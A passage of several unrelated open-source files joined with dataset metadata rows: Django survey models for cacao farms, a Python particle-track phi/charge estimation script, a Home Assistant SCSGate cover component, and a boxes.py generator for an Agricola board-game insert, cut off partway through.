('A', 'Difícil de implementar'),
('B', 'Alto costo'),
('C', 'Necesita mucha inversión'),
('D', 'Necesita mucha mano de obra'),
('E', 'No aporta al desarrollo de las plantas'),
('F', 'No aplica'),
)
class CierreSuelo3(models.Model):
tema = models.IntegerField(choices=CHOICE_CIERRE_SUELO_TEMA3)
abono = MultiSelectField(choices=CHOICE_CIERRE_SUELO_RESPUESTAS3,
verbose_name='Abono verde y coberturas')
hojarasca = MultiSelectField(choices=CHOICE_CIERRE_SUELO_RESPUESTAS3,
verbose_name='Hojarasca de los árboles')
organico = MultiSelectField(choices=CHOICE_CIERRE_SUELO_RESPUESTAS3,
verbose_name='Abono orgánico')
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"4 .2 tema 3"
CHOICE_CIERRE_PLAGA_TEMA1 = ((1, 'Nivel de daño en la parcela'),
(2, 'Nivel de daño en las fincas vecinas'),)
class CierrePlaga1(models.Model):
tema = models.IntegerField(choices=CHOICE_CIERRE_PLAGA_TEMA1)
monilla = models.FloatField()
mazorca = models.FloatField('Mazorca Negra')
zompopos = models.FloatField()
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"4 .3 tema 1"
CHOICE_CIERRE_PLAGA_TEMA2 = ((1, 'Prácticas para prevenir'),)
CHOICE_CIERRE_PLAGA_RESPUESTAS2 = (
('A', 'Eliminar mazorcas enfermas'),
('B', 'Realizar poda'),
('C', 'Manejo de sombra'),
('D', 'Abonar las plantas'),
('E', 'Buen manejo de piso'),
('F', 'No aplica'),
)
CHOICE_CIERRE_PLAGA_RESPUESTAS_ZOMPOPO = (
('A', 'Eliminar zompoperas'),
('B', 'Realizar caseo'),
('C', 'Sembrar plantas repelentes'),
('D', 'Utilizar cal o ceniza'),
('E', 'Buen manejo de piso'),
('F', 'No aplica'),
)
class CierrePlaga2(models.Model):
tema = models.IntegerField(choices=CHOICE_CIERRE_PLAGA_TEMA2)
monilla = MultiSelectField(choices=CHOICE_CIERRE_PLAGA_RESPUESTAS2,
verbose_name='Monilla')
mazorca = MultiSelectField(choices=CHOICE_CIERRE_PLAGA_RESPUESTAS2,
verbose_name='Mazorca Negra')
zompopos = MultiSelectField(choices=CHOICE_CIERRE_PLAGA_RESPUESTAS_ZOMPOPO,
verbose_name='Zompopos')
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"4 .3 tema 2"
CHOICE_CIERRE_PLAGA_TEMA3 = ((1, 'Prácticas para controlar'),)
CHOICE_CIERRE_PLAGA_RESPUESTAS3 = (
('A', 'Aplicar caldo sulfo-calcico'),
('B', 'Aplicar fungicidas'),
('C', 'No aplica'),
)
CHOICE_CIERRE_PLAGA_RESPUESTAS_ZOMPOPO3 = (
('A', 'Aplicar venenos en las zompoperas'),
('B', 'Proteger las plantas con plástico'),
('C', 'No aplica'),
)
class CierrePlaga3(models.Model):
tema = models.IntegerField(choices=CHOICE_CIERRE_PLAGA_TEMA3)
monilla = MultiSelectField(choices=CHOICE_CIERRE_PLAGA_RESPUESTAS3,
verbose_name='Monilla')
mazorca = MultiSelectField(choices=CHOICE_CIERRE_PLAGA_RESPUESTAS3,
verbose_name='Mazorca Negra')
zompopos = MultiSelectField(choices=CHOICE_CIERRE_PLAGA_RESPUESTAS_ZOMPOPO3,
verbose_name='Zompopos')
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"4 .3 tema 3"
CHOICE_CIERRE_CICLO_TRABAJO1_RESPUESTA = (
(1, 'Mucho'),
(2, 'Algo'),
(3, 'Poco'),
(4, 'Nada '),
)
CHOICE_CIERRE_CICLO_TRABAJO2_RESPUESTA = (
(1, 'Todas'),
(2, 'Algunas'),
(3, 'Pocas'),
(4, 'Ninguna'),
)
CHOICE_CIERRE_CICLO_TRABAJO3_RESPUESTA = (
(1, 'Demasiada visitas'),
(2, 'Adecuadas visitas'),
(3, 'Pocas visitas'),
)
CHOICE_CIERRE_CICLO_TRABAJO4_RESPUESTA = (
(1, 'Demasiada larga'),
(2, 'Adecuado tiempo '),
(3, 'Muy corta'),
)
CHOICE_CIERRE_CICLO_TRABAJO5_RESPUESTA = (
(1, 'Si y con mucho ánimo'),
(2, 'Si pero con poco ánimo'),
    (3, 'Si porque me siento obligado'),
(4, 'No quiero seguir'),
)
class CierreCicloTrabajo(models.Model):
pregunta1 = models.IntegerField(choices=CHOICE_CIERRE_CICLO_TRABAJO1_RESPUESTA,
verbose_name='¿Las visitas que hemos realizados han servido para aprender nuevas cosas? ')
pregunta2 = models.IntegerField(choices=CHOICE_CIERRE_CICLO_TRABAJO1_RESPUESTA,
verbose_name='¿Las visitas que hemos realizados han servido para observar sobre diferentes aspectos de la parcela de cacao? ')
pregunta3 = models.IntegerField(choices=CHOICE_CIERRE_CICLO_TRABAJO1_RESPUESTA,
verbose_name='¿Las observaciones y discusiones han servido para mejorar el manejo de las parcela de cacao?')
pregunta4 = models.IntegerField(choices=CHOICE_CIERRE_CICLO_TRABAJO2_RESPUESTA,
verbose_name='¿Han podido implementar las acciones que se acordaron a partir de las visitas?')
pregunta5 = models.IntegerField(choices=CHOICE_CIERRE_CICLO_TRABAJO3_RESPUESTA,
verbose_name='¿Qué piensa sobre la frecuencia de las visitas?')
pregunta6 = models.IntegerField(choices=CHOICE_CIERRE_CICLO_TRABAJO4_RESPUESTA,
verbose_name='¿Qué piensa sobre el tiempo que dura cada visita?')
pregunta7 = models.IntegerField(choices=CHOICE_CIERRE_CICLO_TRABAJO5_RESPUESTA,
verbose_name='¿Quiere seguir trabajando con las visitas para el segundo ciclo?')
pregunta8 = models.IntegerField(choices=((1,'Si'),(2,'No'),),
verbose_name='Estaría usted interesado organizar un día de campo en su finca para que otras y otros productores vengan a visitar la parcela?')
pregunta9 = models.TextField('¿Qué sugiere para mejorar el trabajo de este ciclo?')
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"5 ciclo de trabajo"
| mit | 5,736,390,111,348,182,000 | 37.740102 | 166 | 0.538431 | false | 3.342004 | false | false | false |
lstorchi/pca_fit | utilities/estimate_phi_and_charge.py | 1 | 2929 | import numpy
import math
import sys
import re
from scipy import stats
####################################################################
def file_len(fname):
with open(fname) as f:
for i, l in enumerate(f):
pass
return i + 1
####################################################################
filename = "noname.txt"
if (len(sys.argv) == 1):
print >> sys.stderr, "usage: ", sys.argv[0], " filename.txt"
exit(1)
else:
filename = sys.argv[1]
numofline = file_len(filename)
fp = open(filename, "r")
# skip the header line of the input file
fp.readline()
phidiffvalues = []
x = []
y = []
for i in range(numofline):
l = fp.readline()
if not l:
break
p = re.compile(r'\s+')
line = p.sub(' ', l)
line = line.lstrip()
line = line.rstrip()
plist = line.split(" ")
numof = int(plist[1])
zval = numpy.zeros(numof)
rval = numpy.zeros(numof)
zval13 = numpy.zeros(numof)
rval13 = numpy.zeros(numof)
phival = numpy.zeros(numof)
charge = 0.0
layersids = ""
for j in range(numof):
coordline = fp.readline()
coordline = p.sub(' ', coordline)
coordline = coordline.lstrip()
coordline = coordline.rstrip()
coordlinelist = coordline.split(" ")
layersids += coordlinelist[3]
pid = int(coordlinelist[7])
if (pid > 0):
charge = 1.0
else:
charge = -1.0
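        # hit position -> cylindrical coordinates (r, phi) around the beam axis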
xi = float(coordlinelist[0])
yi = float(coordlinelist[1])
zi = float(coordlinelist[2])
ri = math.sqrt(math.pow(xi, 2.0) + math.pow (yi, 2.0))
phii = math.atan2(yi, xi)
rval[j] = ri
phival[j] = phii
zval[j] = zi
if (j < 3):
rval13[j] = ri
zval13[j] = zi
paramline = fp.readline()
paramline = p.sub(' ', paramline)
paramline = paramline.lstrip()
paramline = paramline.rstrip()
paramlinelist = paramline.split(" ")
pt = float(paramlinelist[0])
phi = float(paramlinelist[1])
eta = float(paramlinelist[3])
z0 = float(paramlinelist[4])
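    # convert pseudorapidity to polar angle: theta = 2*atan(exp(-eta))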
theta = 2.0 * math.atan (math.exp(-eta))
pz = pt * math.cos(theta)
# quick check for layers id
if (layersids != "5678910"):
print >> sys.stderr, "Wrong seq: ", layersids
else:
if pt >= 3.0:
print "RZPhi plane using layers 1 and 6: "
slope = (phival[5]-phival[0])/(rval[5]-rval[0])
print "layers 1 6 c/pt: ", charge/pt, " slope: ", slope
y.append(charge/pt)
x.append(slope)
intercept = phival[0] - slope*rval[0]
print "layers 1 6 phi: ", phi, " intercept: ", intercept, " diff: ", phi-intercept
phidiffvalues.append(phi-intercept)
print "phi layers 1 6: "
print "Num of events: ", len(phidiffvalues)
print "Mean val: ", numpy.mean(phidiffvalues)
print "STD val: ", numpy.std(phidiffvalues)
slope, intercept, r_value, p_value, std_err = stats.linregress(x,y)
print "Lin Regr slope, intercept, r_value, p_value, std_err"
print slope, intercept, r_value, p_value, std_err
fp.close()
| apache-2.0 | 1,603,819,680,319,063,300 | 20.536765 | 90 | 0.576989 | false | 3.019588 | false | false | false |
molobrakos/home-assistant | homeassistant/components/scsgate/cover.py | 7 | 2704 | """Support for SCSGate covers."""
import logging
import voluptuous as vol
from homeassistant.components import scsgate
from homeassistant.components.cover import (CoverDevice, PLATFORM_SCHEMA)
from homeassistant.const import (CONF_DEVICES, CONF_NAME)
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_DEVICES):
cv.schema_with_slug_keys(scsgate.SCSGATE_SCHEMA),
})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the SCSGate cover."""
devices = config.get(CONF_DEVICES)
covers = []
logger = logging.getLogger(__name__)
if devices:
for _, entity_info in devices.items():
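            # skip SCS ids already registered with the SCSGate monitor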
if entity_info[scsgate.CONF_SCS_ID] in scsgate.SCSGATE.devices:
continue
name = entity_info[CONF_NAME]
scs_id = entity_info[scsgate.CONF_SCS_ID]
logger.info("Adding %s scsgate.cover", name)
cover = SCSGateCover(name=name, scs_id=scs_id, logger=logger)
scsgate.SCSGATE.add_device(cover)
covers.append(cover)
add_entities(covers)
class SCSGateCover(CoverDevice):
"""Representation of SCSGate cover."""
def __init__(self, scs_id, name, logger):
"""Initialize the cover."""
self._scs_id = scs_id
self._name = name
self._logger = logger
@property
def scs_id(self):
"""Return the SCSGate ID."""
return self._scs_id
@property
def should_poll(self):
"""No polling needed."""
return False
@property
def name(self):
"""Return the name of the cover."""
return self._name
@property
def is_closed(self):
"""Return if the cover is closed."""
return None
def open_cover(self, **kwargs):
"""Move the cover."""
from scsgate.tasks import RaiseRollerShutterTask
scsgate.SCSGATE.append_task(
RaiseRollerShutterTask(target=self._scs_id))
def close_cover(self, **kwargs):
"""Move the cover down."""
from scsgate.tasks import LowerRollerShutterTask
scsgate.SCSGATE.append_task(
LowerRollerShutterTask(target=self._scs_id))
def stop_cover(self, **kwargs):
"""Stop the cover."""
from scsgate.tasks import HaltRollerShutterTask
scsgate.SCSGATE.append_task(HaltRollerShutterTask(target=self._scs_id))
def process_event(self, message):
"""Handle a SCSGate message related with this cover."""
self._logger.debug("Cover %s, got message %s",
self._scs_id, message.toggled)
| apache-2.0 | 3,655,453,133,303,029,000 | 27.765957 | 79 | 0.628328 | false | 3.719395 | false | false | false |
florianfesti/boxes | boxes/generators/agricolainsert.py | 1 | 30390 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (C) 2020 Guillaume Collic
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import math
from functools import partial
from boxes import Boxes, edges
from .dividertray import (
SlotDescriptionsGenerator,
DividerSlotsEdge,
)
class AgricolaInsert(Boxes):
"""
Agricola Revised Edition game box insert, including some expansions.
"""
ui_group = "Misc"
description = """
This insert was designed with 3 mm plywood in mind, and should work fine with
materials around this thickness.
This is an insert for the [Agricola Revised Edition](https://boardgamegeek.com/boardgame/200680/agricola-revised-edition)
board game. It is specifically designed around the [Farmers Of The Moor expansion](https://boardgamegeek.com/boardgameexpansion/257344/agricola-farmers-moor),
and should also store the [5-6 players expansion](https://boardgamegeek.com/boardgameexpansion/210625/agricola-expansion-5-and-6-players)
(not tested, but I tried to take everything into account for it; please let us
know if you test it).
It can be stored inside the original game box, including the 2 expansions,
with the lid slightly raised.
The parts of a given element are mostly generated next to each other vertically.
It should be straightforward to match them.
Here are the different elements, from left to right in the generated file.
#### Card tray
The cards are all kept in a tray, with paper dividers to sort them easily. When
the tray is not full of cards, wood dividers slide into slots to keep the
cards from falling into the empty space.
There should be enough space for the main game, Farmers Of The Moor, and the 5-6
player expansion, but not much more than that.
To keep a lower profile, the cards are at a slight angle, and the paper
dividers' tabs are horizontal instead of vertical.
A small wall keeps the cards against one side while the tabs protrude on the
other side, above the small wall.
The wall with the big hole is the sloped one. It goes between the two
"comb-like" walls first, with its two small holes at the bottom. Then there is a
low-height long wall with a sloped edge which should go from the sloped wall to
the other side. You can finish the tray with the last wall at the end.
#### Upper level trays
4 trays with movable walls are used to store resources. They were designed to
store them in this order:
* Stone / Vegetable / Pig / Cow
* Reed / Grain / Sheep
* Wood / Clay
* Food / Fire
The walls would probably be better fixed instead of movable, but I would like
to test with the 5-6 player expansion first to be sure their positions are
correct with it too.
The little feet of the movable wall should be glued. The triangles are put
horizontally, with their bases towards the sides.
#### Lower level tray
The lower level tray is used to store the horses.
#### Room/Field tiles
Two boxes are generated to store the room/field tiles. One for the wood/field,
the other for the clay/stone. They are stored with the main opening facing up,
but during play I prefer to turn them so this face is on the side.
#### Moor/Forest and miscellaneous tiles
A box is generated to store the Moor/Forest tiles, and some other tiles such as
the "multiple resources" cardboard tokens.
The Moor/Forest tiles are at the same height as the Room/Field ones, and the
upper level trays sit directly on them. The horse box and player boxes are
slightly lower. The Moor/Forest box has a lowered corner (the one for the miscellaneous
tiles). Two cardboard pieces can be stored between the smaller boxes and the
upper level trays (as seen on the picture).
Be sure to match the pieces so that the walls with smaller heights are next to
each other.
#### Players bit boxes
Each player has its own box where the bits of his color are stored.
The cardboard bed from Farmers Of The Moor is central to this box.
* The fences are stored inside the bed
* The bed is placed in the box, with holes to keep it there (and to take less
height)
* The stables are stored in the two corners
* The five farmers are stored between the bed and the three walls, alternately
head up and head down.
During assembly, the small bars are put in the middle holes. The two bigger
holes at the ends are used for the bed feet. The bars keep the bed from
protruding underneath.
"""
def __init__(self):
Boxes.__init__(self)
self.addSettingsArgs(edges.FingerJointSettings, surroundingspaces=1.0)
def render(self):
player_box_height = 34.5
player_box_inner_width = 50.5
bigger_box_inner_height = 36.7
row_width = 37.2
tray_inner_height = 17
box_width = 218
card_tray_height = (
self.thickness * 2 + tray_inner_height + bigger_box_inner_height
)
card_tray_width = (
305.35 - player_box_inner_width * 2 - row_width * 2 - 9 * self.thickness
)
self.render_card_divider_tray(card_tray_height, box_width, card_tray_width)
self.render_upper_token_trays(tray_inner_height, box_width)
wood_room_box_width = 39.8
self.render_room_box(wood_room_box_width, bigger_box_inner_height, row_width)
stone_room_box_width = 26.7
self.render_room_box(stone_room_box_width, bigger_box_inner_height, row_width)
moor_box_length = 84.6
self.render_moor_box(
bigger_box_inner_height, player_box_height, row_width, moor_box_length
)
horse_box_margin = 0.5
horse_box_length = (
box_width
- wood_room_box_width
- stone_room_box_width
- moor_box_length
- 6 * self.thickness
- horse_box_margin
)
self.render_horse_box(player_box_height, row_width, horse_box_length)
for _ in range(6):
self.render_player_box(player_box_height, player_box_inner_width)
def render_card_divider_tray(
self, card_tray_height, card_tray_length, card_tray_width
):
"""
The whole tray which contains the cards, including its dividers.
Cards are at an angle, to save height.
"""
self.ctx.save()
tray_inner_length = card_tray_length - self.thickness
margin_for_score_sheet = 0 # 3 if you want more space for score sheet
sleeved_cards_width = 62 + margin_for_score_sheet
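        # Lean the cards so a sleeved card's top edge sits flush with the tray
        # rim: cos(angle) = tray height / card width.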
rad = math.acos(card_tray_height / sleeved_cards_width)
angle = math.degrees(rad)
cos = math.cos(rad)
tan = math.tan(rad)
sin = math.sin(rad)
slots_number = 19
slot_depth = 30
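        # evenly spaced, identically angled slots along the tray for the divider tabs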
slot_descriptions = SlotDescriptionsGenerator().generate_all_same_angles(
[tray_inner_length / slots_number for _ in range(slots_number)],
self.thickness,
0.2,
slot_depth,
card_tray_height,
angle,
)
slot_descriptions.adjust_to_target_length(tray_inner_length)
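        # height of the sloped back wall (the tan terms compensate for
        # material thickness at the joints)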
sloped_wall_height = sleeved_cards_width - self.thickness * (tan + 1 / tan)
sloped_wall_posx_at_y0 = (
tray_inner_length - sloped_wall_height * tan - cos * self.thickness
)
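        # center the finger-hole line on the sloped wall's thickness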
sloped_wall_posx = sloped_wall_posx_at_y0 + cos * self.thickness / 2
sloped_wall_posy = sin * self.thickness / 2
dse = DividerSlotsEdge(self, slot_descriptions.descriptions)
for _ in range(2):
self.rectangularWall(
tray_inner_length,
card_tray_height,
["e", "e", dse, "f"],
move="up",
callback=[
partial(
lambda: self.fingerHolesAt(
sloped_wall_posx,
sloped_wall_posy,
sloped_wall_height,
angle=90 - angle,
)
)
],
)
# generate spacer
spacer_height = card_tray_height / 2
        spacer_spacing = card_tray_width - 99.8
spacer_upper_width = sloped_wall_posx_at_y0 + spacer_height * tan
self.trapezoidWall(
spacer_height,
spacer_upper_width,
sloped_wall_posx_at_y0,
"fefe",
move="up rotated",
)
self.rectangularWall(
card_tray_width,
card_tray_height,
"eFeF",
move="up",
callback=[
partial(
lambda: self.fingerHolesAt(
spacer_spacing - self.thickness / 2, 0, spacer_height
)
)
],
)
self.rectangularWall(
card_tray_width,
sloped_wall_height,
"efef",
move="up",
callback=[
partial(
self.generate_card_tray_sloped_wall_holes,
card_tray_width,
sloped_wall_height,
spacer_height,
spacer_spacing,
rad,
)
],
)
self.ctx.restore()
self.rectangularWall(card_tray_length, 0, "FFFF", move="right only")
self.ctx.save()
divider_height = sleeved_cards_width - self.thickness * tan
self.generate_divider(
card_tray_width, divider_height, slot_depth, spacer_spacing, "up"
)
self.explain(
[
"Wood divider",
"Hard separation to keep the card",
"from slipping in empty space left.",
"Takes more space, but won't move.",
"Duplicate as much as you want",
"(I use 2).",
]
)
self.ctx.restore()
self.rectangularWall(card_tray_width, 0, "ffff", move="right only")
self.ctx.save()
self.generate_paper_divider(
card_tray_width, sleeved_cards_width, slot_depth, spacer_spacing, "up"
)
self.explain(
[
"Paper divider",
"Soft separation to search easily",
"the card group you need",
"(by expansion, number of player,",
"etc.).",
"Duplicate as much as you want",
"(I use 7).",
]
)
self.ctx.restore()
self.rectangularWall(card_tray_width, 0, "ffff", move="right only")
def explain(self, strings):
self.text(
str.join(
"\n",
strings,
),
fontsize=7,
align="bottom left",
)
def generate_sloped_wall_holes(self, side_wall_length, rad, sloped_wall_height):
cos = math.cos(rad)
tan = math.tan(rad)
sin = math.sin(rad)
posx_at_y0 = side_wall_length - sloped_wall_height * tan
posx = posx_at_y0 - cos * self.thickness / 2
posy = sin * self.thickness / 2
self.fingerHolesAt(posx, posy, sloped_wall_height, angle=90 - math.degrees(rad))
def generate_card_tray_sloped_wall_holes(
self, side_wall_length, sloped_wall_height, spacer_height, spacer_spacing, rad
):
# Spacer finger holes
self.fingerHolesAt(
side_wall_length - (spacer_spacing - self.thickness / 2),
# the sloped wall doesn't exactly touch the bottom of the spacer
-self.thickness * math.tan(rad),
spacer_height / math.cos(rad),
)
# Big hole to access "lost" space behind sloped wall
radius = 5
padding = 8
total_loss = 2 * radius + 2 * padding
self.moveTo(radius + padding, padding)
self.polyline(
side_wall_length - total_loss,
(90, radius),
sloped_wall_height - total_loss,
(90, radius),
side_wall_length - total_loss,
(90, radius),
sloped_wall_height - total_loss,
(90, radius),
)
def generate_paper_divider(self, width, height, slot_depth, spacer_spacing, move):
"""
A card separation made of paper, which moves freely in the card tray.
        Takes less space and is easy to manipulate, but won't block cards in place.
"""
if self.move(width, height, move, True):
return
margin = 0.5
actual_width = width - margin
self.polyline(
actual_width - spacer_spacing,
90,
height - slot_depth,
-90,
spacer_spacing,
90,
slot_depth,
90,
actual_width,
90,
height,
90,
)
# Move for next piece
self.move(width, height, move)
def generate_divider(self, width, height, slot_depth, spacer_spacing, move):
"""
A card separation made of wood which slides in the side slots.
        Can be useful for hard separations, but takes more space and is
        less movable than the paper ones.
"""
total_width = width + 2 * self.thickness
if self.move(total_width, height, move, True):
return
radius = 16
padding = 20
divider_notch_depth = 35
self.polyline(
self.thickness + spacer_spacing + padding - radius,
(90, radius),
divider_notch_depth - radius - radius,
(-90, radius),
width - 2 * radius - 2 * padding - spacer_spacing,
(-90, radius),
divider_notch_depth - radius - radius,
(90, radius),
self.thickness + padding - radius,
90,
slot_depth,
90,
self.thickness,
-90,
height - slot_depth,
90,
width - spacer_spacing,
90,
height - slot_depth,
-90,
self.thickness + spacer_spacing,
90,
slot_depth,
)
# Move for next piece
self.move(total_width, height, move)
def render_horse_box(self, player_box_height, row_width, width):
"""
Box for the horses on lower level. Same height as player boxes.
"""
length = 2 * row_width + 3 * self.thickness
self.render_simple_tray(width, length, player_box_height)
def render_moor_box(
self, bigger_box_inner_height, player_box_height, row_width, length
):
"""
Box for the moor/forest tiles, and the cardboard tokens with multiple
units of resources.
        A corner (the one for the tokens) is lowered to the same height as the
        player boxes, to store 2 levels of small boards there.
"""
self.ctx.save()
height = bigger_box_inner_height
lowered_height = player_box_height - self.thickness
lowered_corner_height = height - lowered_height
corner_length = 53.5
self.rectangularWall(
length,
2 * row_width + self.thickness,
"FfFf",
move="up",
callback=[
                lambda: self.fingerHolesAt(
                    0, row_width + 0.5 * self.thickness, length, 0
                )
],
)
for i in range(2):
self.rectangularWall(
length,
lowered_height,
[
"f",
"f",
MoorBoxSideEdge(
self, corner_length, lowered_corner_height, i % 2 == 0
),
"f",
],
move="up",
)
self.rectangularWall(length, height / 2, "ffef", move="up")
for i in range(2):
self.rectangularWall(
2 * row_width + self.thickness,
lowered_height,
[
"F",
"F",
MoorBoxHoleEdge(self, height, lowered_corner_height, i % 2 == 0),
"F",
],
move="up",
callback=[
partial(self.generate_side_finger_holes, row_width, height / 2)
],
)
self.ctx.restore()
self.rectangularWall(length, 0, "FFFF", move="right only")
def generate_side_finger_holes(self, row_width, height):
self.fingerHolesAt(row_width + 0.5 * self.thickness, 0, height)
def render_room_box(self, width, height, row_width):
"""
        A box for storing the room/field tiles.
"""
border_height = 12
room_box_length = row_width * 2 + self.thickness
self.ctx.save()
self.rectangularWall(
room_box_length,
height,
"eFfF",
move="up",
callback=[partial(self.generate_side_finger_holes, row_width, height)],
)
self.rectangularWall(
room_box_length,
width,
"FFfF",
move="up",
callback=[partial(self.generate_side_finger_holes, row_width, width)],
)
self.rectangularWall(
room_box_length,
border_height,
"FFeF",
move="up",
callback=[
partial(self.generate_side_finger_holes, row_width, border_height)
],
)
for _ in range(3):
self.trapezoidWall(width, height, border_height, "ffef", move="up")
self.ctx.restore()
self.rectangularWall(room_box_length, 0, "FFFF", move="right only")
def render_player_box(self, player_box_height, player_box_inner_width):
"""
        A box for storing all the bits of a single player,
        including (and designed for) the cardboard bed from Farmers Of The Moor.
"""
self.ctx.save()
bed_inner_height = player_box_height - self.thickness
bed_inner_length = 66.75
bed_inner_width = player_box_inner_width
cardboard_bed_foot_height = 6.5
cardboard_bed_hole_margin = 5
cardboard_bed_hole_length = 12
bed_head_length = 20
bed_foot_height = 18
support_length = 38
bed_edge = Bed2SidesEdge(
self, bed_inner_length, bed_head_length, bed_foot_height
)
noop_edge = NoopEdge(self)
self.ctx.save()
optim_180_x = (
bed_inner_length + self.thickness + bed_head_length + 2 * self.spacing
)
optim_180_y = 2 * bed_foot_height - player_box_height + 2 * self.spacing
for _ in range(2):
self.rectangularWall(
bed_inner_length,
bed_inner_height,
["F", bed_edge, noop_edge, "F"],
move="up",
)
self.moveTo(optim_180_x, optim_180_y, -180)
self.ctx.restore()
self.moveTo(0, bed_inner_height + self.thickness + self.spacing + optim_180_y)
self.rectangularWall(
bed_inner_length,
bed_inner_width,
"feff",
move="up",
callback=[
partial(
self.generate_bed_holes,
bed_inner_width,
cardboard_bed_hole_margin,
cardboard_bed_hole_length,
support_length,
)
],
)
self.ctx.save()
self.rectangularWall(
bed_inner_width,
bed_inner_height,
["F", "f", BedHeadEdge(self, bed_inner_height - 15), "f"],
move="right",
)
for _ in range(2):
self.rectangularWall(
cardboard_bed_foot_height - self.thickness,
support_length,
"efee",
move="right",
)
self.ctx.restore()
self.rectangularWall(
bed_inner_width,
bed_inner_height,
"Ffef",
move="up only",
)
self.ctx.restore()
self.rectangularWall(
bed_inner_length + bed_head_length + self.spacing - self.thickness,
0,
"FFFF",
move="right only",
)
def generate_bed_holes(self, width, margin, hole_length, support_length):
support_start = margin + hole_length
bed_width = 29.5
bed_space_to_wall = (width - bed_width) / 2
bed_feet_width = 3
posy_1 = bed_space_to_wall
posy_2 = width - bed_space_to_wall
for y, direction in [(posy_1, 1), (posy_2, -1)]:
bed_feet_middle_y = y + direction * bed_feet_width / 2
support_middle_y = y + direction * self.thickness / 2
self.rectangularHole(
margin,
bed_feet_middle_y,
hole_length,
bed_feet_width,
center_x=False,
)
self.fingerHolesAt(support_start, support_middle_y, support_length, angle=0)
self.rectangularHole(
support_start + support_length,
bed_feet_middle_y,
hole_length,
bed_feet_width,
center_x=False,
)
def render_upper_token_trays(self, tray_inner_height, box_width):
"""
        Upper level: multiple trays, one per resource
        (except horses, which live on the lower level).
"""
tray_height = tray_inner_height + self.thickness
upper_level_width = 196
upper_level_length = box_width
row_width = upper_level_width / 3
# Stone / Vegetable / Pig / Cow
self.render_simple_tray(row_width, upper_level_length, tray_height, 3)
# Reed / Grain / Sheep
self.render_simple_tray(row_width, upper_level_length * 2 / 3, tray_height, 2)
# Wood / Clay
self.render_simple_tray(row_width, upper_level_length * 2 / 3, tray_height, 1)
# Food / Fire
self.render_simple_tray(upper_level_length / 3, row_width * 2, tray_height, 1)
def render_simple_tray(self, outer_width, outer_length, outer_height, dividers=0):
"""
One of the upper level trays, with movable dividers.
"""
width = outer_width - 2 * self.thickness
length = outer_length - 2 * self.thickness
height = outer_height - self.thickness
self.ctx.save()
self.rectangularWall(width, length, "FFFF", move="up")
for _ in range(2):
self.rectangularWall(width, height, "ffef", move="up")
self.ctx.restore()
self.rectangularWall(width, length, "FFFF", move="right only")
for _ in range(2):
self.rectangularWall(height, length, "FfFe", move="right")
if dividers:
self.ctx.save()
for _ in range(dividers):
self.render_simple_tray_divider(width, height, "up")
self.ctx.restore()
self.render_simple_tray_divider(width, height, "right only")
def render_simple_tray_divider(self, width, height, move):
"""
Simple movable divider. A wall with small feet for a little more stability.
"""
if self.move(height, width, move, True):
return
t = self.thickness
self.polyline(
height - t,
90,
t,
-90,
t,
90,
width - 2 * t,
90,
t,
-90,
t,
90,
height - t,
90,
width,
90,
)
self.move(height, width, move)
self.render_simple_tray_divider_feet(width, height, move)
def render_simple_tray_divider_feet(self, width, height, move):
sqr2 = math.sqrt(2)
t = self.thickness
divider_foot_width = 2 * t
full_width = t + 2 * divider_foot_width
move_length = self.spacing + full_width / sqr2
move_width = self.spacing + max(full_width, height)
if self.move(move_width, move_length, move, True):
return
self.ctx.save()
self.polyline(
sqr2 * divider_foot_width,
135,
t,
-90,
t,
-90,
t,
135,
sqr2 * divider_foot_width,
135,
full_width,
135,
)
self.ctx.restore()
self.moveTo(-self.burn / sqr2, self.burn * (1 + 1 / sqr2), 45)
self.moveTo(full_width)
self.polyline(
0,
135,
sqr2 * divider_foot_width,
135,
t,
-90,
t,
-90,
t,
135,
sqr2 * divider_foot_width,
135,
)
self.move(move_width, move_length, move)
class MoorBoxSideEdge(edges.BaseEdge):
"""
Edge for the sides of the moor tiles box
"""
def __init__(self, boxes, corner_length, corner_height, lower_corner):
super(MoorBoxSideEdge, self).__init__(boxes, None)
self.corner_height = corner_height
self.lower_corner = lower_corner
self.corner_length = corner_length
def __call__(self, length, **kw):
radius = self.corner_height / 2
if self.lower_corner:
self.polyline(
length - self.corner_height - self.corner_length,
(90, radius),
0,
(-90, radius),
self.corner_length,
)
else:
self.polyline(length)
def startwidth(self):
return self.corner_height
def endwidth(self):
return 0 if self.lower_corner else self.corner_height
class MoorBoxHoleEdge(edges.BaseEdge):
"""
    Edge that cuts the notches for the moor tiles box
"""
def __init__(self, boxes, height, corner_height, lower_corner):
super(MoorBoxHoleEdge, self).__init__(boxes, None)
self.height = height
self.corner_height = corner_height
self.lower_corner = lower_corner
def __call__(self, length, **kw):
one_side_width = (length - self.thickness) / 2
notch_width = 20
radius = 6
upper_edge = (one_side_width - notch_width - 2 * radius) / 2
hole_start = 10
lowered_hole_start = 2
hole_depth = self.height - 2 * radius
lower_edge = notch_width - 2 * radius
        def one_side_polyline(margin1, margin2):
            return [
                upper_edge,
                (90, radius),
                hole_depth - margin1,
                (-90, radius),
                lower_edge,
                (-90, radius),
                hole_depth - margin2,
                (90, radius),
                upper_edge,
            ]
normal_side_polyline = one_side_polyline(hole_start, hole_start)
corner_side_polyline = one_side_polyline(
lowered_hole_start, lowered_hole_start + self.corner_height
)
full_polyline = (
normal_side_polyline
+ [0, self.thickness, 0]
+ (corner_side_polyline if self.lower_corner else normal_side_polyline)
)
self.polyline(*full_polyline)
def startwidth(self):
return self.corner_height
def endwidth(self):
return 0 if self.lower_corner else self.corner_height
class BedHeadEdge(edges.BaseEdge):
"""
    Edge that forms the head side of the Agricola player box
"""
def __init__(self, boxes, hole_depth):
super(BedHeadEdge, self).__init__(boxes, None)
